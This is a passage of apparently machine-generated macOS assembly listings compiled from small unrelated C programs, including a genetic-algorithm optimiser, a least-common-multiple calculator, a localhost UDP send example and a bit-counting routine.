_lga_ctx(%rip), %rcx cltd idivl 44(%rcx) movq _lga_ctx(%rip), %rax movl %edx, 32(%rax) movl $0, -16(%rbp) LBB17_6: ## Parent Loop BB17_4 Depth=1 ## => This Inner Loop Header: Depth=2 movl -16(%rbp), %eax movq _lga_ctx(%rip), %rcx cmpl 40(%rcx), %eax jge LBB17_9 ## %bb.7: ## in Loop: Header=BB17_6 Depth=2 callq _lga_ssqrrand mulss -4(%rbp), %xmm0 movq _lga_ctx(%rip), %rax movq (%rax), %rax movl -12(%rbp), %ecx movq _lga_ctx(%rip), %rdx imull 40(%rdx), %ecx addl -16(%rbp), %ecx movslq %ecx, %rcx movss %xmm0, (%rax,%rcx,4) ## %bb.8: ## in Loop: Header=BB17_6 Depth=2 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB17_6 LBB17_9: ## in Loop: Header=BB17_4 Depth=1 movq _lga_ctx(%rip), %rcx movl 36(%rcx), %eax movl %eax, %edx addl $1, %edx movl %edx, 36(%rcx) movl %eax, -8(%rbp) movss -20(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movq 16(%rax), %rax movslq -8(%rbp), %rcx movss %xmm0, (%rax,%rcx,4) movl -12(%rbp), %edx movq _lga_ctx(%rip), %rax movq 24(%rax), %rax movslq -8(%rbp), %rcx movl %edx, (%rax,%rcx,4) jmp LBB17_4 LBB17_10: addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal4,4byte_literals .p2align 2 ## -- Begin function lga_breed LCPI18_0: .long 0x40000000 ## float 2 LCPI18_3: .long 0x40800000 ## float 4 LCPI18_4: .long 0x3f800000 ## float 1 LCPI18_5: .long 0x41200000 ## float 10 .section __TEXT,__literal8,8byte_literals .p2align 3 LCPI18_1: .quad 0x3f847ae147ae147b ## double 0.01 LCPI18_2: .quad 0x3fe0000000000000 ## double 0.5 .section __TEXT,__text,regular,pure_instructions .globl _lga_breed .p2align 4, 0x90 _lga_breed: ## @lga_breed .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -8(%rbp) cmpq $0, _lga_ctx(%rip) jne LBB18_2 ## %bb.1: jmp LBB18_20 LBB18_2: movq _lga_ctx(%rip), %rax cmpl $16, 36(%rax) jge LBB18_8 ## %bb.3: movl $0, -12(%rbp) LBB18_4: ## =>This Inner Loop Header: Depth=1 movl -12(%rbp), %eax movq _lga_ctx(%rip), %rcx cmpl 40(%rcx), %eax jge LBB18_7 ## %bb.5: ## in Loop: Header=BB18_4 Depth=1 callq _lga_ssqrrand movss LCPI18_5(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero mulss %xmm1, %xmm0 movq -8(%rbp), %rax movslq -12(%rbp), %rcx movss %xmm0, (%rax,%rcx,4) ## %bb.6: ## in Loop: Header=BB18_4 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB18_4 LBB18_7: jmp LBB18_20 LBB18_8: movq _lga_ctx(%rip), %rax cmpl $0, 48(%rax) je LBB18_14 ## %bb.9: callq _lga_sqrrand movss LCPI18_3(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero mulss %xmm1, %xmm0 cvttss2si %xmm0, %eax movl %eax, -12(%rbp) callq _lga_sqrrand movss LCPI18_3(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero mulss %xmm1, %xmm0 cvttss2si %xmm0, %eax movl %eax, -16(%rbp) movq _lga_ctx(%rip), %rax movslq -12(%rbp), %rcx movss 120(%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movslq -16(%rbp), %rcx addss 120(%rax,%rcx,4), %xmm0 cvtss2sd %xmm0, %xmm0 movsd LCPI18_2(%rip), %xmm1 ## xmm1 = mem[0],zero mulsd %xmm1, %xmm0 cvtsd2ss %xmm0, %xmm0 movss %xmm0, -24(%rbp) movss -24(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm0 movsd %xmm0, -40(%rbp) ## 8-byte Spill callq _lga_sfrand movsd -40(%rbp), %xmm1 ## 8-byte Reload ## xmm1 = mem[0],zero cvtss2sd %xmm0, %xmm0 movsd LCPI18_1(%rip), %xmm2 ## xmm2 = mem[0],zero mulsd %xmm2, %xmm0 movss -24(%rbp), %xmm2 ## xmm2 = mem[0],zero,zero,zero cvtss2sd %xmm2, %xmm2 mulsd %xmm2, %xmm0 addsd %xmm1, %xmm0 cvtsd2ss %xmm0, %xmm0 movss %xmm0, -24(%rbp) movq _lga_ctx(%rip), %rax movss 52(%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero addss -24(%rbp), %xmm0 movss LCPI18_0(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero divss %xmm1, %xmm0 movss %xmm0, -32(%rbp) xorps %xmm0, %xmm0 ucomiss -32(%rbp), %xmm0 jbe LBB18_11 ## %bb.10: xorps %xmm0, %xmm0 movss %xmm0, -32(%rbp) LBB18_11: movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movss LCPI18_4(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero ucomiss %xmm1, %xmm0 jbe LBB18_13 ## %bb.12: movss LCPI18_4(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero movss %xmm0, -32(%rbp) LBB18_13: movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movss %xmm0, 52(%rax) jmp LBB18_19 LBB18_14: callq _lga_sqrrand movss LCPI18_3(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero mulss %xmm1, %xmm0 cvttss2si %xmm0, %eax movl %eax, -12(%rbp) callq _lga_sqrrand movss LCPI18_3(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero mulss %xmm1, %xmm0 cvttss2si %xmm0, %eax movl %eax, -16(%rbp) movq _lga_ctx(%rip), %rax movslq -12(%rbp), %rcx movss 120(%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movslq -16(%rbp), %rcx addss 120(%rax,%rcx,4), %xmm0 cvtss2sd %xmm0, %xmm0 movsd LCPI18_2(%rip), %xmm1 ## xmm1 = mem[0],zero mulsd %xmm1, %xmm0 cvtsd2ss %xmm0, %xmm0 movss %xmm0, -24(%rbp) movss -24(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm0 movsd %xmm0, -48(%rbp) ## 8-byte Spill callq _lga_sfrand movsd -48(%rbp), %xmm1 ## 8-byte Reload ## xmm1 = mem[0],zero cvtss2sd %xmm0, %xmm0 movsd LCPI18_1(%rip), %xmm2 ## xmm2 = mem[0],zero mulsd %xmm2, %xmm0 movss -24(%rbp), %xmm2 ## xmm2 = mem[0],zero,zero,zero cvtss2sd %xmm2, %xmm2 mulsd %xmm2, %xmm0 addsd %xmm1, %xmm0 cvtsd2ss %xmm0, %xmm0 movss %xmm0, -24(%rbp) movq _lga_ctx(%rip), %rax movss 52(%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero addss -24(%rbp), %xmm0 movss LCPI18_0(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero divss %xmm1, %xmm0 movss %xmm0, -32(%rbp) xorps %xmm0, %xmm0 ucomiss -32(%rbp), %xmm0 jbe LBB18_16 ## %bb.15: xorps %xmm0, %xmm0 movss %xmm0, -32(%rbp) LBB18_16: movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movss LCPI18_4(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero ucomiss %xmm1, %xmm0 jbe LBB18_18 ## %bb.17: movss LCPI18_4(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero movss %xmm0, -32(%rbp) LBB18_18: movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _lga_ctx(%rip), %rax movss %xmm0, 52(%rax) LBB18_19: callq _lga_sqrrand movq _lga_ctx(%rip), %rax movl 36(%rax), %eax movl $16, %ecx cltd idivl %ecx cvtsi2ss %eax, %xmm1 mulss %xmm1, %xmm0 cvttss2si %xmm0, %eax movl %eax, -12(%rbp) callq _lga_sqrrand movq _lga_ctx(%rip), %rax movl 36(%rax), %eax movl $16, %ecx cltd idivl %ecx cvtsi2ss %eax, %xmm1 mulss %xmm1, %xmm0 cvttss2si %xmm0, %eax movl %eax, -16(%rbp) movq _lga_ctx(%rip), %rax movq 24(%rax), %rax movslq -12(%rbp), %rcx movl (%rax,%rcx,4), %eax movl %eax, -12(%rbp) movq _lga_ctx(%rip), %rax movq 24(%rax), %rax movslq -16(%rbp), %rcx movl (%rax,%rcx,4), %eax movl %eax, -16(%rbp) movq _lga_ctx(%rip), %rax movl 40(%rax), %eax movl %eax, -20(%rbp) movq _lga_ctx(%rip), %rax movq (%rax), %rdi movl -12(%rbp), %eax imull -20(%rbp), %eax cltq shlq $2, %rax addq %rax, %rdi movq _lga_ctx(%rip), %rax movq (%rax), %rsi movl -16(%rbp), %eax imull -20(%rbp), %eax cltq shlq $2, %rax addq %rax, %rsi movq -8(%rbp), %rdx movl -20(%rbp), %ecx movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero callq _lga_breed_raw LBB18_20: addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal4,4byte_literals .p2align 2 ## -- Begin function main LCPI19_0: .long 0x41200000 ## float 10 .section __TEXT,__literal8,8byte_literals .p2align 3 LCPI19_1: .quad 0x3f1a36e2eb1c432d ## double 1.0E-4 LCPI19_3: .quad 0x4050000000000000 ## double 64 LCPI19_4: .quad 0x401921fb54442d18 ## double 6.2831853071795862 .section __TEXT,__literal16,16byte_literals .p2align 4 LCPI19_2: .quad 0x7fffffffffffffff ## double NaN .quad 0x7fffffffffffffff ## double NaN .section __TEXT,__text,regular,pure_instructions .globl _main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $304, %rsp ## imm = 0x130 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -276(%rbp) movl $4096, %edi ## imm = 0x1000 movl $64, %esi callq _lga_newctx movss LCPI19_0(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero callq _lga_populate movl $0, -292(%rbp) LBB19_1: ## =>This Loop Header: Depth=1 ## Child Loop BB19_3 Depth 2 cmpl $16777216, -292(%rbp) ## imm = 0x1000000 jge LBB19_12 ## %bb.2: ## in Loop: Header=BB19_1 Depth=1 leaq -272(%rbp), %rdi callq _lga_breed xorps %xmm0, %xmm0 movss %xmm0, -280(%rbp) movl $0, -296(%rbp) LBB19_3: ## Parent Loop BB19_1 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $64, -296(%rbp) jge LBB19_6 ## %bb.4: ## in Loop: Header=BB19_3 Depth=2 cvtsi2sdl -296(%rbp), %xmm1 movsd LCPI19_4(%rip), %xmm0 ## xmm0 = mem[0],zero mulsd %xmm1, %xmm0 movsd LCPI19_3(%rip), %xmm1 ## xmm1 = mem[0],zero divsd %xmm1, %xmm0 callq _sin cvtsd2ss %xmm0, %xmm0 movss %xmm0, -284(%rbp) movslq -296(%rbp), %rax movss -272(%rbp,%rax,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero subss -284(%rbp), %xmm0 cvtss2sd %xmm0, %xmm1 movaps LCPI19_2(%rip), %xmm0 ## xmm0 = [NaN,NaN] pand %xmm0, %xmm1 movss -280(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm0 addsd %xmm1, %xmm0 cvtsd2ss %xmm0, %xmm0 movss %xmm0, -280(%rbp) ## %bb.5: ## in Loop: Header=BB19_3 Depth=2 movl -296(%rbp), %eax addl $1, %eax movl %eax, -296(%rbp) jmp LBB19_3 LBB19_6: ## in Loop: Header=BB19_1 Depth=1 leaq -272(%rbp), %rdi movss -280(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero callq _lga_insert movl -292(%rbp), %eax movl $1024, %ecx ## imm = 0x400 cltd idivl %ecx cmpl $0, %edx jne LBB19_8 ## %bb.7: ## in Loop: Header=BB19_1 Depth=1 movl -292(%rbp), %esi movss -280(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm0 movq _lga_ctx(%rip), %rax movss 52(%rax), %xmm1 ## xmm1 = mem[0],zero,zero,zero cvtss2sd %xmm1, %xmm1 leaq L_.str(%rip), %rdi movb $2, %al callq _printf movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush LBB19_8: ## in Loop: Header=BB19_1 Depth=1 movss -280(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm1 movsd LCPI19_1(%rip), %xmm0 ## xmm0 = mem[0],zero ucomisd %xmm1, %xmm0 jbe LBB19_10 ## %bb.9: jmp LBB19_12 LBB19_10: ## in Loop: Header=BB19_1 Depth=1 jmp LBB19_11 LBB19_11: ## in Loop: Header=BB19_1 Depth=1 movl -292(%rbp), %eax addl $1, %eax movl %eax, -292(%rbp) jmp LBB19_1 LBB19_12: leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movl $0, -296(%rbp) LBB19_13: ## =>This Inner Loop Header: Depth=1 cmpl $64, -296(%rbp) jge LBB19_16 ## %bb.14: ## in Loop: Header=BB19_13 Depth=1 movslq -296(%rbp), %rax movss -272(%rbp,%rax,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm0 leaq L_.str.2(%rip), %rdi movb $1, %al callq _printf ## %bb.15: ## in Loop: Header=BB19_13 Depth=1 movl -296(%rbp), %eax addl $1, %eax movl %eax, -296(%rbp) jmp LBB19_13 LBB19_16: leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movl -276(%rbp), %eax movl %eax, -300(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB19_18 ## %bb.17: movl -300(%rbp), %eax ## 4-byte Reload addq $304, %rsp ## imm = 0x130 popq %rbp retq LBB19_18: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _lga_ctx_arr ## @lga_ctx_arr .zerofill __DATA,__common,_lga_ctx_arr,8,3 .globl _lga_ctx ## @lga_ctx .zerofill __DATA,__common,_lga_ctx,8,3 .comm _lga_nctx,4,2 ## @lga_nctx .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d %f %f \r" L_.str.1: ## @.str.1 .asciz "\n" L_.str.2: ## @.str.2 .asciz "%f " .subsections_via_symbols
the_stack_data/206392925.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/151706140.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov x9, sp sub x8, x29, #4 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF str x0, [sp, #32] ; 8-byte Folded Spill bl _scanf adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldr x0, [sp, #32] ; 8-byte Folded Reload mov x9, sp sub x8, x29, #8 str x8, [x9] bl _scanf ldur w9, [x29, #-4] ; implicit-def: $x8 mov x8, x9 stur x8, [x29, #-24] ; 8-byte Folded Spill ldur w9, [x29, #-8] ; implicit-def: $x8 mov x8, x9 stur x8, [x29, #-16] ; 8-byte Folded Spill ldur w0, [x29, #-4] ldur w1, [x29, #-8] bl _z ldur x10, [x29, #-24] ; 8-byte Folded Reload ldur x8, [x29, #-16] ; 8-byte Folded Reload mov x9, sp str x10, [x9] str x8, [x9, #8] ; implicit-def: $x8 mov x8, x0 str x8, [x9, #16] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .globl _z ; -- Begin function z .p2align 2 _z: ; @z .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] str w1, [sp, #8] ldur w8, [x29, #-4] ldr w9, [sp, #8] mul w8, w8, w9 str w8, [sp, #4] ; 4-byte Folded Spill ldur w0, [x29, #-4] ldr w1, [sp, #8] bl _gcd ldr w8, [sp, #4] ; 4-byte Folded Reload sdiv w0, w8, w0 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _gcd ; -- Begin function gcd .p2align 2 _gcd: ; @gcd .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str w0, [sp, #8] str w1, [sp, #4] ldr w8, [sp, #4] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB2_2 b LBB2_1 LBB2_1: ldr w8, [sp, #8] stur w8, [x29, #-4] b LBB2_3 LBB2_2: ldr w0, [sp, #4] ldr w8, [sp, #8] ldr w10, [sp, #4] sdiv w9, w8, w10 mul w9, w9, w10 subs w1, w8, w9 bl _gcd stur w0, [x29, #-4] b LBB2_3 LBB2_3: ldur w0, [x29, #-4] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Enter the first number: " l_.str.1: ; @.str.1 .asciz "%d" l_.str.2: ; @.str.2 .asciz "Enter the second number: " l_.str.3: ; @.str.3 .asciz "The least common multiple of %d and %d is %d.\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi leaq -4(%rbp), %rsi movb $0, %al callq _scanf leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi leaq -8(%rbp), %rsi movb $0, %al callq _scanf movl -4(%rbp), %eax movl %eax, -16(%rbp) ## 4-byte Spill movl -8(%rbp), %eax movl %eax, -12(%rbp) ## 4-byte Spill movl -4(%rbp), %edi movl -8(%rbp), %esi callq _z movl -16(%rbp), %esi ## 4-byte Reload movl -12(%rbp), %edx ## 4-byte Reload movl %eax, %ecx leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _z ## -- Begin function z .p2align 4, 0x90 _z: ## @z .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movl %esi, -8(%rbp) movl -4(%rbp), %eax imull -8(%rbp), %eax movl %eax, -12(%rbp) ## 4-byte Spill movl -4(%rbp), %edi movl -8(%rbp), %esi callq _gcd movl %eax, %ecx movl -12(%rbp), %eax ## 4-byte Reload cltd idivl %ecx addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _gcd ## -- Begin function gcd .p2align 4, 0x90 _gcd: ## @gcd .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -8(%rbp) movl %esi, -12(%rbp) cmpl $0, -12(%rbp) jne LBB2_2 ## %bb.1: movl -8(%rbp), %eax movl %eax, -4(%rbp) jmp LBB2_3 LBB2_2: movl -12(%rbp), %edi movl -8(%rbp), %eax cltd idivl -12(%rbp) movl %edx, %esi callq _gcd movl %eax, -4(%rbp) LBB2_3: movl -4(%rbp), %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Enter the first number: " L_.str.1: ## @.str.1 .asciz "%d" L_.str.2: ## @.str.2 .asciz "Enter the second number: " L_.str.3: ## @.str.3 .asciz "The least common multiple of %d and %d is %d.\n" .subsections_via_symbols
the_stack_data/69452.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #128 .cfi_def_cfa_offset 128 stp x29, x30, [sp, #112] ; 16-byte Folded Spill add x29, sp, #112 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] mov w2, #0 stur wzr, [x29, #-44] adrp x8, l_.str@PAGE add x8, x8, l_.str@PAGEOFF str x8, [sp, #48] mov w1, #2 mov x0, x1 bl _socket stur w0, [x29, #-48] subs w8, w0, #0 cset w8, ge tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_2 LBB0_2: sub x8, x29, #24 str x8, [sp, #32] ; 8-byte Folded Spill stur xzr, [x29, #-24] stur xzr, [x29, #-16] stur xzr, [x29, #-40] stur xzr, [x29, #-32] mov w8, #2 str w8, [sp, #12] ; 4-byte Folded Spill sturb w8, [x29, #-23] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF str x0, [sp, #16] ; 8-byte Folded Spill bl _inet_addr ldr w8, [sp, #12] ; 4-byte Folded Reload mov x9, x0 ldr x0, [sp, #16] ; 8-byte Folded Reload stur w9, [x29, #-20] mov w9, #58375 str w9, [sp, #28] ; 4-byte Folded Spill sturh w9, [x29, #-22] sturb w8, [x29, #-39] bl _inet_addr ldr w8, [sp, #28] ; 4-byte Folded Reload ldr x1, [sp, #32] ; 8-byte Folded Reload stur w0, [x29, #-36] sturh w8, [x29, #-38] ldur w0, [x29, #-48] mov w2, #16 bl _bind subs w8, w0, #0 cset w8, ge tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf mov w0, #1 bl _exit LBB0_4: adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf b LBB0_5 LBB0_5: mov w8, #16 str w8, [sp, #44] ldur w8, [x29, #-48] str w8, [sp, #8] ; 4-byte Folded Spill ldr x8, [sp, #48] str x8, [sp] ; 8-byte Folded Spill ldr x0, [sp, #48] bl _strlen ldr x1, [sp] ; 8-byte Folded Reload mov x2, x0 ldr w0, [sp, #8] ; 4-byte Folded Reload ldr w5, [sp, #44] mov w3, #0 sub x4, x29, #40 bl _sendto adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_7 b LBB0_6 LBB0_6: bl ___stack_chk_fail LBB0_7: mov w0, #0 ldp x29, x30, [sp, #112] ; 16-byte Folded Reload add sp, sp, #128 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Edie" l_.str.1: ; @.str.1 .asciz "error opening socket" l_.str.2: ; @.str.2 .asciz "127.0.0.1" l_.str.3: ; @.str.3 .asciz "bind failed" l_.str.4: ; @.str.4 .asciz "binding success\n" l_.str.5: ; @.str.5 .asciz "Hello message sent.\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $96, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -44(%rbp) leaq L_.str(%rip), %rax movq %rax, -64(%rbp) movl $2, %esi xorl %edx, %edx movl %esi, %edi callq _socket movl %eax, -48(%rbp) cmpl $0, %eax jge LBB0_2 ## %bb.1: leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf LBB0_2: leaq -24(%rbp), %rdi xorl %esi, %esi movl $16, %edx callq _memset leaq -40(%rbp), %rdi xorl %esi, %esi movl $16, %edx callq _memset movb $2, -23(%rbp) leaq L_.str.2(%rip), %rdi callq _inet_addr movl %eax, -20(%rbp) movw $-7161, -22(%rbp) ## imm = 0xE407 movb $2, -39(%rbp) leaq L_.str.2(%rip), %rdi callq _inet_addr movl %eax, -36(%rbp) movw $-7161, -38(%rbp) ## imm = 0xE407 movl -48(%rbp), %edi leaq -24(%rbp), %rsi movl $16, %edx callq _bind cmpl $0, %eax jge LBB0_4 ## %bb.3: leaq L_.str.3(%rip), %rdi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _printf movl $1, %edi callq _exit LBB0_4: leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf ## %bb.5: movl $16, -68(%rbp) movl -48(%rbp), %eax movl %eax, -84(%rbp) ## 4-byte Spill movq -64(%rbp), %rax movq %rax, -80(%rbp) ## 8-byte Spill movq -64(%rbp), %rdi callq _strlen movl -84(%rbp), %edi ## 4-byte Reload movq -80(%rbp), %rsi ## 8-byte Reload movq %rax, %rdx leaq -40(%rbp), %r8 movl -68(%rbp), %r9d xorl %ecx, %ecx callq _sendto leaq L_.str.5(%rip), %rdi movb $0, %al callq _printf movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_7 ## %bb.6: xorl %eax, %eax addq $96, %rsp popq %rbp retq LBB0_7: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Edie" L_.str.1: ## @.str.1 .asciz "error opening socket" L_.str.2: ## @.str.2 .asciz "127.0.0.1" L_.str.3: ## @.str.3 .asciz "bind failed" L_.str.4: ## @.str.4 .asciz "binding success\n" L_.str.5: ## @.str.5 .asciz "Hello message sent.\n" .subsections_via_symbols
the_stack_data/43886701.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/95449878.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/198279.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _bit_count ; -- Begin function bit_count .p2align 2 _bit_count: ; @bit_count .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str w0, [sp, #12] str wzr, [sp, #8] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #12] lsr w8, w8, #1 str w8, [sp, #12] ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB0_1 LBB0_3: ldr w0, [sp, #8] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _string_index ; -- Begin function string_index .p2align 2 _string_index: ; @string_index .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] str x1, [sp, #16] str w2, [sp, #12] str wzr, [sp, #8] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #8] ldr w9, [sp, #12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_6 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldur x0, [x29, #-8] ldr x8, [sp, #16] ldrsw x9, [sp, #8] ldr x1, 